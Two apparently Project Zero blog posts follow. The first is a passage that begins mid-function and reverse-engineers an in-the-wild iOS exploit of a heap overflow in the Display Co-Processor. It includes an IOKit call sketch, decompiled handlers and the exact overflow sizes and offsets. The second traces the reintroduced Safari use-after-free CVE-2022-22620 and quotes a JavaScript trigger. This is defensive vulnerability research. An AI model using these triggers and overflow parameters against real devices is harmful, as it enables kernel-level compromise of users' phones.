  IOMobileFramebufferUserClient *this,

  void *reference,

  IOExternalMethodArguments *args)

{

  const unsigned __int64 *extra_args;

  u8 *structureInput;

  structureInput = args->structureInput;

  if ( structureInput && args->scalarInputCount >= 2 )

  {

    if ( args->scalarInputCount == 2 )

      extra_args = 0LL;

    else

      extra_args = args->scalarInput + 2;

    return this->framebuffer_ap->set_block_dcp(

             this->task,

             args->scalarInput[0],

             args->scalarInput[1],

             extra_args,

             args->scalarInputCount - 2,

             structureInput,

             args->structureInputSize);

  } else {

    return 0xE00002C2;

  }

}


This unpacks the IOConnectCallMethod arguments and passes them to:


IOMobileFramebufferAP::set_block_dcp(

        IOMobileFramebufferAP *this,

        task *task,

        int first_scalar_input,

        int second_scalar_input,

        const unsigned __int64 *pointer_to_remaining_scalar_inputs,

        unsigned int scalar_input_count_minus_2,

        const unsigned __int8 *struct_input,

        unsigned __int64 struct_input_size)


This method uses some autogenerated code to serialise the external method arguments into a buffer like this:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u64 cntExtraScalars

  u8[] structInput

  u64 CntStructInput

}


which is then passed to UnifiedPipeline2::rpc along with a 4-byte ASCII method identifier ('A435' here):


UnifiedPipeline2::rpc(

      'A435',

      arg_struct,

      0x105Cu,

      &retval_buf,

      4u);


UnifiedPipeline2::rpc calls DCPLink::rpc which calls AppleDCPLinkService::rpc to perform one more level of serialisation which packs the method identifier and a "stream identifier" together with the arg_struct shown above.


AppleDCPLinkService::rpc then calls rpc_caller_gated to allocate space in a shared memory buffer, copy the buffer into there then signal to the DCP that a message is available.


Effectively the implementation of the IOMobileFramebuffer user client has been moved on to the DCP and the external method interface is now a proxy shim, via shared memory, to the actual implementations of the external methods which run on the DCP.
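
Putting the AP side together: reaching s_set_block from userspace needs nothing more than the standard IOKit calls. A minimal sketch (error handling omitted; the structure input contents and size here are placeholders and depend on the chosen block handler):


#include <stdint.h>
#include <IOKit/IOKitLib.h>

void call_s_set_block_sketch(void) {
  io_service_t service = IOServiceGetMatchingService(
      kIOMasterPortDefault, IOServiceMatching("AppleCLCD2"));
  io_connect_t conn = MACH_PORT_NULL;
  IOServiceOpen(service, mach_task_self(), 0, &conn);

  // Selector 78 is s_set_block; the first scalar selects the block type
  // (the exploit uses 7 and 19) and the second scalar is left at 0.
  uint64_t scalars[2] = { 19, 0 };
  uint8_t struct_input[0x1000] = { 0 };  // placeholder serialised block input

  IOConnectCallMethod(conn, 78,
                      scalars, 2,
                      struct_input, sizeof(struct_input),
                      NULL, NULL, NULL, NULL);
}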

Exploit flow: the other side

The next challenge is to find where the messages start being processed on the DCP. Looking through the log strings there's a function which is clearly called rpc_callee_gated - quite likely that's the receive side of the rpc_caller_gated function we saw earlier.


rpc_callee_gated unpacks the wire format then has an enormous switch statement which maps all the 4-letter RPC codes to function pointers:


      switch ( rpc_id )

      {

        case 'A000':

          goto LABEL_146;

        case 'A001':

          handler_fptr = callback_handler_A001;

          break;

        case 'A002':

          handler_fptr = callback_handler_A002;

          break;

        case 'A003':

          handler_fptr = callback_handler_A003;

          break;

        case 'A004':

          handler_fptr = callback_handler_A004;

          break;

        case 'A005':

          handler_fptr = callback_handler_A005;

          break;


At the bottom of this switch statement is the invocation of the callback handler:


ret = handler_fptr(

          meta,

          in_struct_ptr,

          in_struct_size,

          out_struct_ptr,

          out_struct_size);


in_struct_ptr points to a copy of the serialised IOConnectCallMethod arguments we saw being serialised earlier on the application processor:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u32 cntExtraScalars

  u8[] structInput

  u64 cntStructInput

}


The callback unpacks that buffer and calls a C++ virtual function:


unsigned int

callback_handler_A435(

  u8* meta,

  void *args,

  uint32_t args_size,

  void *out_struct_ptr,

  uint32_t out_struct_size)

{

  int64 instance_id;

  uint64_t instance;

  int err;

  int retval;

  unsigned int result;

  instance_id = meta->instance_id;

  instance =

    global_instance_table[instance_id].IOMobileFramebufferType;

  if ( !instance ) {

    log_fatal(

      "IOMFB: %s: no instance for instance ID: %u\n",

      "static T *IOMFB::InstanceTracker::instance"

        "(IOMFB::InstanceTracker::tracked_entity_t, uint32_t)"

        " [T = IOMobileFramebuffer]",

      instance_id);

  }

  err = (instance-16)->vtable_0x378( // virtual call

         (instance-16),

         args->task,

         args->scalar_input_0,

         args->scalar_input_1,

         args->remaining_scalar_inputs,

         args->cntExtraScalars,

         args->structInput,

         args->cntStructInput);

  retval = convert_error(err);

  result = 0;

  *(_DWORD *)out_struct_ptr = retval;

  return result;

}


The challenge here is to figure out where that virtual call goes. The object is being looked up in a global table based on the instance id. We can't just set a breakpoint, and whilst emulating the firmware is probably possible, that would likely be a long project in itself. I took a hackier approach: we know that the vtable needs to be at least 0x380 bytes large, so just go through all those vtables, decompile them and see if the prototypes look reasonable!


There's one clear match in the vtable for the UNPI type:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)


Here's my reversed implementation of UNPI::set_block:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)

{

  struct block_handler_holder *holder;

  struct metadispatcher metadisp;

  if ( second_scalar_input )

    return 0x80000001LL;

  holder = this->UPPipeDCP_H13P->block_handler_holders;

  if ( !holder )

    return 0x8000000BLL;

  metadisp.address_of_some_zerofill_static_buffer = &unk_3B8D18;

  metadisp.handlers_holder = holder;

  metadisp.structure_input_buffer = structure_input_buffer;

  metadisp.structure_input_size = structure_input_size;

  metadisp.remaining_scalar_inputs = remaining_scalar_inputs;

  metadisp.cnt_remaining_sclar_input = cnt_remaining_scalar_inputs;

  metadisp.some_flags = 0x40000000LL;

  metadisp.dispatcher_fptr = a_dispatcher;

  metadisp.offset_of_something_which_looks_serialization_related = &off_1C1308;

  return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);

}


This method wraps up the arguments into another structure I've called metadispatcher:


struct __attribute__((aligned(8))) metadispatcher

{

 uint64_t address_of_some_zerofill_static_buffer;

 uint64_t some_flags;

 __int64 (__fastcall *dispatcher_fptr)(struct metadispatcher *, struct BlockHandler *, __int64, _QWORD);

 uint64_t offset_of_something_which_looks_serialization_related;

 struct block_handler_holder *handlers_holder;

 uint64_t structure_input_buffer;

 uint64_t structure_input_size;

 uint64_t remaining_scalar_inputs;

 uint32_t cnt_remaining_sclar_input;

};


That metadispatcher object is then passed to this method:


return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);


In there we reach this code:


  block_type_handler = lookup_a_handler_for_block_type_and_subtype(

                         a1,

                         first_scalar_input, // block_type

                         a3);                // subtype


The exploit calls this set_block external method twice, passing two different values for first_scalar_input: 7 and 19. Here we can see that those correspond to looking up two different block handler objects.


The lookup function searches a linked list of block handler structures; the head of the list is stored at offset 0x1448 in the UPPipeDCP_H13P object, and handlers are registered dynamically by a method I've named add_handler_for_block_type:


add_handler_for_block_type(struct block_handler_holder *handler_list,

                           struct BlockHandler *handler)

The logging code tells us that this is in a file called IOMFBBlockManager.cpp. IDA finds 44 cross-references to this method, indicating that there are probably that many different block handlers. The structure of each registered block handler is something like this:


struct __cppobj BlockHandler : RTKIT_RC_RTTI_BASE

{

  uint64_t field_16;

  struct handler_inner_types_entry *inner_types_array;

  uint32_t n_inner_types_array_entries;

  uint32_t field_36;

  uint8_t can_run_without_commandgate;

  uint32_t block_type;

  uint64_t list_link;

  uint64_t list_other_link;

  uint32_t some_other_type_field;

  uint32_t some_other_type_field2;

  uint32_t expected_structure_io_size;

  uint32_t field_76;

  uint64_t getBlock_Impl;

  uint64_t setBlock_Impl;

  uint64_t field_96;

  uint64_t back_ptr_to_UPPipeDCP_H13P;

};


The RTTI type is BLHA (BLock HAndler.)
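
Given that layout, the lookup_a_handler_for_block_type_and_subtype function we saw on the metadispatch path is presumably a straightforward walk of this list; a hedged sketch (the list-head field name is an assumption):


struct BlockHandler *
lookup_handler_sketch(struct block_handler_holder *holder,
                      uint32_t block_type)
{
  // Walk the linked list populated by add_handler_for_block_type,
  // matching on each BLHA's block_type field.
  for (struct BlockHandler *h = holder->head;  // 'head' is a guess
       h != NULL;
       h = (struct BlockHandler *)h->list_link)
  {
    if (h->block_type == block_type)
      return h;
  }
  return NULL;
}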


For example, here's the codepath which builds and registers block handler type 24:


BLHA_24 = (struct BlockHandler *)CXXnew(112LL);

BLHA_24->__vftable = (BlockHandler_vtbl *)BLHA_super_vtable;

BLHA_24->block_type = 24;

BLHA_24->refcnt = 1;

BLHA_24->can_run_without_commandgate = 0;

BLHA_24->some_other_type_field = 0LL;

BLHA_24->expected_structure_io_size = 0xD20;

typeid = typeid_BLHA();

BLHA_24->typeid = typeid;

modify_typeid_ref(typeid, 1);

BLHA_24->__vftable = vtable_BLHA_subclass_type_24;

BLHA_24->inner_types_array = 0LL;

BLHA_24->n_inner_types_array_entries = 0;

BLHA_24->getBlock_Impl = BLHA_24_getBlock_Impl;

BLHA_24->setBlock_Impl = BLHA_24_setBlock_Impl;

BLHA_24->field_96 = 0LL;

BLHA_24->back_ptr_to_UPPipeDCP_H13P = a1;

add_handler_for_block_type(list_holder, BLHA_24);


Each block handler optionally has getBlock_Impl and setBlock_Impl function pointers which appear to implement the actual setting and getting operations.


We can go through all the callsites which add block handlers, tell IDA the types of the arguments, and name all the getBlock and setBlock implementations:


The IDA Pro Names window showing a list of symbols like BLHA_15_getBlock_Impl.

You can perhaps see where this is going: that's looking like really quite a lot of reachable attack surface! Each of those setBlock_Impl functions is reachable by passing a different value for the first scalar argument to IOConnectCallMethod 78.


There's a little bit more reversing though to figure out how exactly to get controlled bytes to those setBlock_Impl functions:

Memory Mapping

The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input. There's another level of indirection: each individual block handler structure has an array of supported "subtypes" which contains metadata detailing where to find the (userspace) pointer to that subtype's input data in the IOConnectCallMethod structure input. The first dword in the structure input is the id of this subtype - in this case for the block handler type 19 the metadata array has a single entry:


<2, 0, 0x5F8, 0x600>


The first value (2) is the subtype id and 0x5f8 and 0x600 tell the DCP from what offset in the structure input data to read a pointer and size from. The DCP then requests a memory mapping from the AP for that memory from the calling task:


return wrap_MemoryDescriptor::withAddressRange(

  *(void*)(structure_input_buffer + addr_offset),

  *(unsigned int *)(structure_input_buffer + size_offset),

  caller_task_ptr);
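
Based on this, the entries in a block handler's inner_types_array plausibly look something like the following (field names are my own guesses; only the meanings of the first, third and fourth values are evident from the code above):


struct handler_inner_types_entry
{
  uint32_t subtype_id;   // matched against the first dword of the structure input (2 here)
  uint32_t unknown;      // second tuple value; purpose unclear (0 here)
  uint32_t addr_offset;  // where in the structure input to read the userspace pointer (0x5F8)
  uint32_t size_offset;  // where to read the mapping size (0x600)
};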


We saw earlier that the AP sends the DCP the struct task pointer of the calling task; when the DCP requests a memory mapping from a user task it sends those raw task struct pointers back to the AP such that the kernel can perform the mapping from the correct task. The memory mapping is abstracted as an MDES object on the DCP side; the implementation of the mapping involves the DCP making an RPC to the AP:


make_link_call('D453', &req, 0x20, &resp, 0x14);


which corresponds to a call to this method on the AP side:


IOMFB::MemDescRelay::withAddressRange(unsigned long long, unsigned long long, unsigned int, task*, unsigned long*, unsigned long long*)


The DCP calls ::prepare and ::map on the returned MDES object (exactly like an IOMemoryDescriptor object in IOKit), gets the mapped pointer and size to pass via a few final levels of indirection to the block handler:


a_descriptor_with_controlled_stuff->dispatcher_fptr(

  a_descriptor_with_controlled_stuff,

  block_type_handler,

  important_ptr,

  important_size);


where the dispatcher_fptr looks like this:


a_dispatcher(

        struct metadispatcher *disp,

        struct BlockHandler *block_handler,

        __int64 controlled_ptr,

        unsigned int controlled_size)

{

  return block_handler->BlockHandler_setBlock(

           block_handler,

           disp->structure_input_buffer,

           disp->structure_input_size,

           disp->remaining_scalar_inputs,

           disp->cnt_remaining_sclar_input,

           disp->handlers_holder->gate,

           controlled_ptr,

           controlled_size);

}


You can see here just how useful it is to keep making structure definitions while reversing; there are so many levels of indirection that it's pretty much impossible to keep it all in your head.


BlockHandler_setBlock is a virtual method on BLHA. This is the implementation for BLHA 19:


BlockHandler19::setBlock(

  struct BlockHandler *this,

  void *structure_input_buffer,

  int64 structure_input_size,

  int64 *remaining_scalar_inputs,

  unsigned int cnt_remaining_scalar_inputs,

  struct CommandGate *gate,

  void* mapped_mdesc_ptr,

  unsigned int mapped_mdesc_length)


This uses a Command Gate (GATI) object (like a call gate in IOKit to serialise calls) to finally get close to actually calling the setBlock_Impl function.


We need to reverse the gate_context structure to follow the controlled data through the gate:


struct __attribute__((aligned(8))) gate_context

{

 struct BlockHandler *the_target_this;

 uint64_t structure_input_buffer;

 void *remaining_scalar_inputs;

 uint32_t cnt_remaining_scalar_inputs;

 uint32_t field_28;

 uint64_t controlled_ptr;

 uint32_t controlled_length;

};


The callgate object uses that context object to finally call the BLHA setBlock handler:


callback_used_by_callgate_in_block_19_setBlock(

  struct UnifiedPipeline *parent_pipeline,

  struct gate_context *context,

  int64 a3,

  int64 a4,

  int64 a5)

{

  return context->the_target_this->setBlock_Impl(

           context->the_target_this->back_ptr_to_UPPipeDCP_H13P,

           context->structure_input_buffer,

           context->remaining_scalar_inputs,

           context->cnt_remaining_scalar_inputs,

           context->controlled_ptr,

           context->controlled_length);

}

SetBlock_Impl

And finally we've made it through the whole callstack following the controlled data from IOConnectCallMethod in userspace on the AP to the setBlock_Impl methods on the DCP!


The prototype of the setBlock_Impl methods looks like this:


setBlock_Impl(struct UPPipeDCP_H13P *pipe_parent,

              void *structure_input_buffer,

              int *remaining_scalar_inputs,

              int cnt_remaining_scalar_inputs,

              void* ptr_via_memdesc,

              unsigned int len_of_memdesc_mapped_buf)


The exploit calls two setBlock_Impl methods: 7 and 19. 7 is fairly simple and seems to just be used to put controlled data in a known location. 19 is the buggy one. From the log strings we can tell that the block type 19 handler is implemented in a file called UniformityCompensator.cpp.


Uniformity Compensation is a way to correct for inconsistencies in brightness and colour reproduction across a display panel. Block type 19 sets and gets a data structure containing this correction information. The setBlock_Impl method calls UniformityCompensator::set and reaches the following code snippet where controlled_size is a fully-controlled u32 value read from the structure input and indirect_buffer_ptr points to the mapped buffer, the contents of which are also controlled:

uint8_t* pages = compensator->inline_buffer; // +0x24

for (int pg_cnt = 0; pg_cnt < 3; pg_cnt++) {

  uint8_t* this_page = pages;

  for (int i = 0; i < controlled_size; i++) {

    memcpy(this_page, indirect_buffer_ptr, 4 * controlled_size);

    indirect_buffer_ptr += 4 * controlled_size;

    this_page += 0x100;

  }

  pages += 0x4000;

}

There's a distinct lack of bounds checking on controlled_size. Based on the structure of the code it looks like it should be restricted to be less than or equal to 64 (as that would result in the input being completely copied to the output buffer.) The compensator->inline_buffer buffer is inline in the compensator object. The structure of the code makes it look like that buffer is probably 0xc000 (three 16k pages) large. To verify this we need to find the allocation site of the compensator object.


It's read from the pipe_parent object and we know that at this point pipe_parent is a UPPipeDCP_H13P object.


There's only one write to that field, here in UPPipeDCP_H13P::setup_tunables_base_target:


compensator = CXXnew(0xC608LL);

...

this->compensator = compensator;


The compensator object is a 0xc608 byte allocation; the 0xc000 sized buffer starts at offset 0x24 so the allocation has enough space for 0xc608-0x24=0xC5E4 bytes before corrupting neighbouring objects.
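
For reference, the absent validation would have been tiny; something like the following before the copy loop would prevent the overflow (a sketch, assuming the intended limit of 64 entries):


// 64 entries * 4 bytes == 0x100 bytes fills exactly one row of the
// inline buffer, so anything larger must be rejected.
if (controlled_size > 64)
  return SOME_ERROR_CODE;  // placeholder; the real error value is unknown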


The structure input provided by the exploit for the block handler 19 setBlock call looks like this:


struct_input_for_block_handler_19[0x5F4] = 70; // controlled_size

struct_input_for_block_handler_19[0x5F8] = address;

struct_input_for_block_handler_19[0x600] = a_size;


This leads to a value of 70 (0x46) for controlled_size in the UniformityCompensator::set snippet shown earlier. (0x5f8 and 0x600 correspond to the offsets we saw earlier in the subtype's table:  <2, 0, 0x5F8, 0x600>)


The inner loop increments the destination pointer by 0x100 each iteration so 0x46 loop iterations will write 0x4618 bytes.


The outer loop writes to three subsequent 0x4000 byte blocks so the third (final) iteration starts writing at 0x24 + 0x8000 and writes a total of 0x4618 bytes, meaning the object would need to be 0xC63C bytes; but we can see that it's only 0xc608, meaning that it will overflow the allocation size by 0x34 bytes. The RTKit malloc implementation looks like it adds 8 bytes of metadata to each allocation so the next object starts at 0xc610.


How much input is consumed? The input is fully consumed with no "rewinding" so it's 3*0x46*0x46*4 = 0xe5b0 bytes. Working backwards from the end of that buffer we know that the final 0x34 bytes of it go off the end of the 0xc608 allocation which means +0xe57c in the input buffer will be the first byte which corrupts the 8 metadata bytes and +0xe584 will be the first byte to corrupt the next object:


A diagram showing that the end of the overflower object overlaps with the metadata and start of the target object.
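
Those offsets are easy to double-check; a few lines of arithmetic reproduce all the numbers above:


#include <cstdio>

int main(void) {
  const unsigned n = 0x46;                             // controlled_size
  unsigned per_block = (n - 1) * 0x100 + 4 * n;        // 0x4618 bytes written per 0x4000 block
  unsigned consumed  = 3 * n * n * 4;                  // 0xe5b0 input bytes consumed
  unsigned write_end = 0x24 + 2 * 0x4000 + per_block;  // 0xc63c, end of the third block
  printf("per_block=0x%x consumed=0x%x\n", per_block, consumed);
  printf("overflow past 0xc608 allocation: 0x%x bytes\n", write_end - 0xc608);
  printf("metadata corruption starts at input +0x%x\n",
         consumed - (write_end - 0xc608));              // +0xe57c
  printf("next-object corruption starts at input +0x%x\n",
         consumed - (write_end - 0xc610));              // +0xe584
  return 0;
}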

This matches up exactly with the overflow object which the exploit builds:


  v24 = address + 0xE584;

  v25 = *(_DWORD *)&v54[48];

  v26 = *(_OWORD *)&v54[32];

  v27 = *(_OWORD *)&v54[16];

  *(_OWORD *)(address + 0xE584) = *(_OWORD *)v54;

  *(_OWORD *)(v24 + 16) = v27;

  *(_OWORD *)(v24 + 32) = v26;

  *(_DWORD *)(v24 + 48) = v25;


The destination object seems to be allocated very early and the DCP RTKit environment appears to be very deterministic with no ASLR. Almost certainly they are attempting to corrupt a neighbouring C++ object with a fake vtable pointer.


Unfortunately for our analysis the trail goes cold here and we can't fully recreate the rest of the exploit. The bytes for the fake DCP C++ object are read from a file in the app's temporary directory (base64 encoded inside a JSON file under the exploit_struct_offsets key) and I don't have a copy of that file. But based on the flow of the rest of the exploit it's pretty clear what happens next:

sudo make me a DART mapping

The DCP, like other coprocessors on iPhone, sits behind a DART (Device Address Resolution Table.) This is like an SMMU (IOMMU in the x86 world) which forces an extra layer of physical address lookup between the DCP and physical memory. DART was covered in great detail in Gal Beniamini's Over The Air - Vol. 2, Pt. 3 blog post.


The DCP clearly needs to access lots of buffers owned by userspace tasks as well as memory managed by the kernel. To do this the DCP makes RPC calls back to the AP which modifies the DART entries accordingly. This appears to be exactly what the DCP exploit does: the D45X family of DCP->AP RPC methods appear to expose an interface for requesting arbitrary physical as well as virtual addresses to be mapped into the DCP DART.


The fake C++ object is most likely a stub which makes such calls on behalf of the exploit, allowing the exploit to read and write kernel memory.
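
As a very rough sketch of what such a stub could do (the request layout is an assumption; only the make_link_call mechanism, the 'D453' method and the 0x20/0x14 buffer sizes were observed above):


struct map_request
{
  uint64_t address;      // address to map into the DCP DART
  uint64_t size;
  uint8_t  opaque[0x10]; // remaining fields unknown, zeroed
};

void map_into_dart_sketch(uint64_t address, uint64_t size)
{
  struct map_request req = { address, size, { 0 } };
  uint8_t resp[0x14] = { 0 };
  make_link_call('D453', &req, 0x20, resp, 0x14);
}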

Conclusions

Segmentation and isolation are in general a positive thing when it comes to security. However, splitting up an existing system into separate, intercommunicating parts can end up exposing unexpected code in unexpected ways.


We've had discussions within Project Zero about whether this DCP vulnerability is interesting at all. After all, if the UniformityCompensator code was going to be running on the Application Processors anyway then the Display Co-Processor didn't really introduce or cause this bug.


Whilst that's true, it's also the case that the DCP certainly made exploitation of this bug significantly easier and more reliable than it would have been on the AP. Apple has invested heavily in memory corruption mitigations over the last few years, so moving an attack surface from a "mitigation heavy" environment to a "mitigation light" one is a regression in that sense.


Another perspective is that the DCP just isn't isolated enough; perhaps the intention was to try to isolate the code on the DCP such that even if it's compromised it's limited in the effect it could have on the entire system. For example, there might be models where the DCP to AP RPC interface is much more restricted.


But again there's a tradeoff: the more restrictive the RPC API, the more the DCP code has to be refactored - a significant investment. Currently, the codebase relies on being able to map arbitrary memory and the API involves passing userspace pointers back and forth.


I've discussed in recent posts how attackers tend to be ahead of the curve. As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too. We saw that in the logic-bug sandbox escape used by NSO and we see that here in this memory-corruption-based privilege escalation that side-stepped kernel mitigations by corrupting memory on a co-processor instead. Both are quite likely to continue working in some form in a post-memory tagging world. Both reveal the stunning depth of attack surface available to the motivated attacker. And both show that defensive security research still has a lot of work to do.

An Autopsy on a Zombie In-the-Wild 0-day

14 June 2022 at 16:00

Posted by Maddie Stone, Google Project Zero

Whenever there’s a new in-the-wild 0-day disclosed, I’m very interested in understanding the root cause of the bug. This allows us to then understand if it was fully fixed, look for variants, and brainstorm new mitigations. This blog is the story of a “zombie” Safari 0-day and how it came back from the dead to be disclosed as exploited in-the-wild in 2022. CVE-2022-22620 was initially fixed in 2013, reintroduced in 2016, and then disclosed as exploited in-the-wild in 2022. If you’re interested in the full root cause analysis for CVE-2022-22620, we’ve published it here.

In the 2020 Year in Review of 0-days exploited in the wild, I wrote how 25% of all 0-days detected and disclosed as exploited in-the-wild in 2020 were variants of previously disclosed vulnerabilities. Almost halfway through 2022 and it seems like we’re seeing a similar trend. Attackers don’t need novel bugs to effectively exploit users with 0-days, but instead can use vulnerabilities closely related to previously disclosed ones. This blog focuses on just one example from this year because it’s a little bit different from other variants that we’ve discussed before. Most variants we’ve discussed previously exist due to incomplete patching. But in this case, the variant was completely patched when the vulnerability was initially reported in 2013. However, the variant was reintroduced 3 years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild 0-day in January 2022.

Getting Started

In the case of CVE-2022-22620, I had two pieces of information to help me figure out the vulnerability: the patch (thanks to Apple for sharing with me!) and the description from the security bulletin stating that the vulnerability is a use-after-free. The primary change in the patch was to change the type of the second argument (stateObject) to the function FrameLoader::loadInSameDocument from a raw pointer, SerializedScriptValue*, to a reference-counted pointer, RefPtr<SerializedScriptValue>.

trunk/Source/WebCore/loader/FrameLoader.cpp (lines 1094-1096):

// This does the same kind of work that didOpenURL does, except it relies on the fact
// that a higher level already checked that the URLs match and the scrolling is the right thing to do.
- void FrameLoader::loadInSameDocument(const URL& url, SerializedScriptValue* stateObject, bool isNewNavigation)
+ void FrameLoader::loadInSameDocument(URL url, RefPtr<SerializedScriptValue> stateObject, bool isNewNavigation)

Whenever I’m doing a root cause analysis on a browser in-the-wild 0-day, along with studying the code, I also usually search through commit history and bug trackers to see if I can find anything related. I do this to try and understand when the bug was introduced, but also to try and save time. (There’s a lot of 0-days to be studied! 😀)

The Previous Life

In the case of CVE-2022-22620, I was scrolling through the git blame view of FrameLoader.cpp. Specifically I was looking at the definition of loadInSameDocument. When looking at the git blame for this line prior to our patch, it’s a very interesting commit. The commit was actually changing the stateObject argument from a reference-counted pointer, PassRefPtr<SerializedScriptValue>, to a raw pointer, SerializedScriptValue*. This change from December 2016 introduced CVE-2022-22620. The Changelog even states:


(WebCore::FrameLoader::loadInSameDocument): Take a raw pointer for the

serialized script value state object. No one was passing ownership.

But pass it along to statePopped as a Ref since we need to pass ownership

of the null value, at least for now.

Now I was intrigued and wanted to track down the previous commit that had changed the stateObject argument to PassRefPtr<SerializedScriptValue>. I was in luck and only had to go back in the history two more steps. There was a commit from 2013 that changed the stateObject argument from the raw pointer, SerializedScriptValue*, to a reference-counted pointer, PassRefPtr<SerializedScriptValue>. This commit from February 2013 was doing the same thing that our commit in 2022 was doing. The commit was titled “Use-after-free in SerializedScriptValue::deserialize” and included a good description of how that use-after-free worked.

The commit also included a test:

Added a test that demonstrated a crash due to use-after-free

of SerializedScriptValue.

Test: fast/history/replacestate-nocrash.html

The trigger from this test is:

Object.prototype.__defineSetter__("foo",function(){history.replaceState("", "")});

history.replaceState({foo:1,zzz:"a".repeat(1<<22)}, "");

history.state.length;

My hope was that the test would crash the vulnerable version of WebKit and I’d be done with my root cause analysis and could move on to the next bug. Unfortunately, it didn’t crash.

The commit description included the comment to check out a Chromium bug. (During this time Chromium still used the WebKit rendering engine. Chromium forked the Blink rendering engine in April 2013.) I saw that my now Project Zero teammate, Sergei Glazunov, originally reported the Chromium bug back in 2013, so I asked him for the details.

The use-after-free from 2013 (no CVE was assigned) was a bug in the implementation of the History API. This API allows access to (and modification of) a stack of the pages visited in the current frame, and these page states are stored as a SerializedScriptValue. The History API exposes a getter for state, and a method replaceState which allows overwriting the "most recent" history entry.

The bug was that in the implementation of the getter for state, SerializedScriptValue::deserialize was called on the current "most recent" history entry value without increasing its reference count. As SerializedScriptValue::deserialize could trigger a callback into user JavaScript, the callback could call replaceState to drop the only reference to the history entry value by replacing it with a new value. When the callback returned, the rest of SerializedScriptValue::deserialize ran with a free'd this pointer.

In order to fix this bug, it appears that the developers decided to change every caller of SerializedScriptValue::deserialize to increase the reference count on the stateObject by changing the argument types from a raw pointer to PassRefPtr<SerializedScriptValue>.  While the originally reported trigger called deserialize on the stateObject through the V8History::stateAccessorGetter function, the developers’ fix also caught and patched the path to deserialize through loadInSameDocument.
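
In pseudocode, the 2013 pattern looked roughly like this (a sketch for illustration, not the actual WebKit code):

// Getter for history.state, pre-2013-fix (sketch):
SerializedScriptValue* state = historyItem->stateObject(); // raw pointer, no ref taken
// deserialize() can call back into user JavaScript...
auto deserialized = state->deserialize(/* ... */);
// ...and if that JavaScript calls history.replaceState(), the last
// reference to |state| is dropped mid-call, so the remainder of
// deserialize() runs on a freed |this| pointer.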

The timeline of the changes impacting the stateObject is:

  • HistoryItem.m_stateObject is type RefPtr<SerializedScriptValue>
  • HistoryItem::stateObject() returns SerializedScriptValue*
  • FrameLoader::loadInSameDocument takes stateObject argument as SerializedScriptValue*
  • HistoryItem::stateObject returns a PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument takes stateObject argument as PassRefPtr<SerializedScriptValue>
  • HistoryItem::stateObject returns RefPtr instead of PassRefPtr
  • HistoryItem::stateObject() is changed to return raw pointer instead of RefPtr
  • FrameLoader::loadInSameDocument changed to take stateObject as a raw pointer instead of PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument changed to take stateObject as a RefPtr<SerializedScriptValue>

The Autopsy

When we look at the timeline of changes for FrameLoader::loadInSameDocument it seems that the bug was re-introduced in December 2016 due to refactoring. The question is: why did the patch author think that loadInSameDocument would not need to hold a reference? From the December 2016 commit ChangeLog: "Take a raw pointer for the serialized script value state object. No one was passing ownership."

My assessment is that it's due to the October 2016 changes to HistoryItem::stateObject. When the author was evaluating the refactoring changes needed in the dom directory in December 2016, it would have appeared that the only calls to loadInSameDocument passed in either a null value or the result of stateObject(), which as of October 2016 returned a raw SerializedScriptValue* pointer. When looking at those two options for the type of an argument, it's potentially understandable that the developer thought that loadInSameDocument did not need to share ownership of stateObject.

So why then was HistoryItem::stateObject’s return value changed from a RefPtr to a raw pointer in October 2016? That I’m struggling to find an explanation for.

According to the description, the patch in October 2016 was intended to “Replace all uses of ExceptionCodeWithMessage with WebCore::Exception”. However when we look at the ChangeLog it seems that the author decided to also do some (seemingly unrelated) refactoring to HistoryItem. These are some of the only changes in the commit whose descriptions aren’t related to exceptions. As an outsider looking at the commits, it seems that the developer by chance thought they’d do a little “clean-up” while working through the required refactoring on the exceptions. If this was simply an additional ad-hoc step while in the code, rather than the goal of the commit, it seems plausible that the developer and reviewers may not have further traced the full lifetime of HistoryItem::stateObject.

While the change to HistoryItem in October 2016 was not sufficient to introduce the bug, it seems that that change likely contributed to the developer in December 2016 thinking that loadInSameDocument didn’t need to increase the reference count on the stateObject.

Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions. It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they’re related to lifetime semantics.

The Zombie

We’ve now tracked down the evolution of changes to fix the 2013 vulnerability…and then revert those fixes… so I got back to identifying the 2022 bug. It’s the same bug, but triggered through a different path. That’s why the 2013 test case wasn’t crashing the version of WebKit that should have been vulnerable to CVE-2022-22620:

  1. The 2013 test case triggers the bug through the V8History::stateAccessorGetter path instead of FrameLoader::loadInSameDocument, and
  2. As a part of Sergei’s 2013 bug report there were additional hardening measures put into place that prevented user-code callbacks being processed during deserialization. 

Therefore we needed to figure out how to call loadInSameDocument and, instead of using the deserialization to trigger a JavaScript callback, find another event in the loadInSameDocument function that would trigger the callback to user JavaScript.

To quickly figure out how to call loadInSameDocument, I modified the WebKit source code to trigger a test failure if loadInSameDocument was ever called and then ran all the tests in the fast/history directory. There were 5 out of the 80 tests that called loadInSameDocument.
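
The modification can be as simple as an assertion at the top of the function (a sketch; the exact change isn't shown here):

void FrameLoader::loadInSameDocument(const URL& url, SerializedScriptValue* stateObject, bool isNewNavigation)
{
    RELEASE_ASSERT_NOT_REACHED(); // any layout test reaching here now fails loudly
    // ... original body ...
}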

